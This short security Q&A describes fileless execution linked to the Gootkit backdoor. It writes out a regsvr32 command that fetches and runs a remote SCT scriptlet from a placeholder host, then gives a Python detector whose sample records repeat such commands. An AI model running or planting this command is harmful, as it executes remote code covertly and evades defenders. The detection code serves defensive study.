One Day Sec

How can the Gootkit backdoor be used for fileless execution?

The `.inf` file can include `RunPreSetupCommands` entries that execute arbitrary commands, such as launching `regsvr32` with a remote SCT scriptlet. For example, the command `regsvr32 /u /s /i:https://example.com/calc.sct scrobj.dll` downloads and executes the scriptlet from the remote URL without writing an executable to disk. This increases the payload's stealth and flexibility, as noted in the analysis of exploiting shellcode via BOOLANG.
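A defender-side detection for the `regsvr32` scriptlet pattern described above, added here as an example and not part of the original Q&A. It scans constructed Sysmon-style process-creation records (the field names and sample values are assumptions) and flags `regsvr32` invocations whose `/i:` argument points to a remote `http(s)` URL alongside `scrobj.dll`, while leaving ordinary local DLL registrations alone.

```python
import re
from typing import Dict, List, Optional

# Constructed Sysmon-style process-creation records (not from any real host);
# the field names and values are assumptions made for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /u /s /i:https://example.com/calc.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32 /s C:\Program Files\Vendor\driver.dll"},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"REGSVR32.EXE -s -i:http://10.0.0.5/a.sct SCROBJ.DLL"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe readme.txt"},
]

# /i: (or -i:) passes its argument to DllInstall; with scrobj.dll that argument
# is resolved as a URL moniker, so a remote http(s) value is the signal here.
REMOTE_INSTALL_ARG = re.compile(r"[/-]i:\s*[\"']?(https?://[^\s\"']+)", re.IGNORECASE)
SCROBJ_DLL = re.compile(r"\bscrobj\.dll\b", re.IGNORECASE)


def flag_event(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding when the event matches the remote-scriptlet pattern."""
    if not event["Image"].lower().endswith("\\regsvr32.exe"):
        return None
    cmd = event["CommandLine"]
    url_match = REMOTE_INSTALL_ARG.search(cmd)
    if url_match and SCROBJ_DLL.search(cmd):
        return {"rule": "regsvr32_remote_scriptlet",
                "url": url_match.group(1),
                "command_line": cmd}
    return None  # local DLL registrations and other processes are not flagged


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Run flag_event over a batch of records and keep only the findings."""
    return [finding for finding in map(flag_event, events) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding['rule']}: {finding['url']}  <-  {finding['command_line']}")
```

Both the `/i:` and `-i:` switch spellings and mixed-case `SCROBJ.DLL` are matched, since `regsvr32` accepts them interchangeably.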
Tags: fileless execution, SCT, regsvr32, INF payload, stealth
